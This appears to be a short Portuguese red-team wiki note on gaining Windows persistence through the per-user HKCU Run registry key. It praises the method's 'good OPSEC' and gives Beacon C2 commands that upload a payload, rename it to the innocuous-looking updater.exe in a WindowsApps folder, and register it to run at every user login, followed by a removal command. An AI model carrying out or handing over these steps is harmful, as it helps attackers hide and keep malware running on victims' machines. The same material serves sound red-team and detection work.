Registry Run Key (HKCU)

Vantagens:

Funciona sem privilégios elevados
Boa OPSEC
Fácil implementação

Descrição:

Adiciona uma entrada na chave de registro:HKCU\Software\Microsoft\Windows\CurrentVersion\Run Isso executa um binário a cada login do usuário.

Comandos Beacon (C2):

cd C:\Users\<user>\AppData\Local\Microsoft\WindowsApps
upload C:\Payloads\http_x64.exe
mv http_x64.exe updater.exe

reg_set HKCU Software\Microsoft\Windows\CurrentVersion\Run Updater REG_EXPAND_SZ %LOCALAPPDATA%\Microsoft\WindowsApps\updater.exe

Remoção da persistência:

reg_delete HKCU Software\Microsoft\Windows\CurrentVersion\Run Updater

Last updated 1 month ago